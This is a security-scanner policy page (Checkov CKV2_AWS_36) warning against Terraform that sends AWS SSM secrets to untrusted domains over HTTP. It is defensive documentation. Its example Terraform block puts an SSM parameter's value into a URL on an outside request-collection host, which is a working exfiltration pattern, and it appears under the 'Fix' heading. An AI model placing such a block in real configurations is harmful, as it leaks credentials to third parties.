Ensure AWS Terraform does not send SSM secrets to untrusted domains over HTTP

Error: AWS Terraform sends SSM secrets to untrusted domains over HTTP

Bridgecrew Policy ID: BC_AWS_GENERAL_129
Checkov Check ID: CKV2_AWS_36
Severity: LOW

AWS Terraform sends SSM secrets to untrusted domains over HTTP

Description

Sending secrets such as passwords and encryption keys over an untrusted network or domain can increase the risk of those secrets being intercepted and compromised. This is because the secrets may not be encrypted while in transit, making it easier for attackers to intercept and read them.

By ensuring that AWS Terraform does not send secrets to untrusted domains over HTTP, you can help protect the confidentiality of your secrets and reduce the risk of them being compromised. Instead, you should use secure protocols such as HTTPS or SSL/TLS to transmit secrets, as these protocols can help protect the secrecy of the secrets in transit.

Fix - Runtime

Fix - Buildtime

Terraform

resource "aws_ssm_parameter" "param2" {
  name = var.parameter_name
  type = "String"
  value = "foo"
}

data "http" "nonleak2" {
  url = "https://enp840cyx28ip.x.pipedream.net/?id=${aws_ssm_parameter.param2.name}&content=${aws_ssm_parameter.param2.value}"
}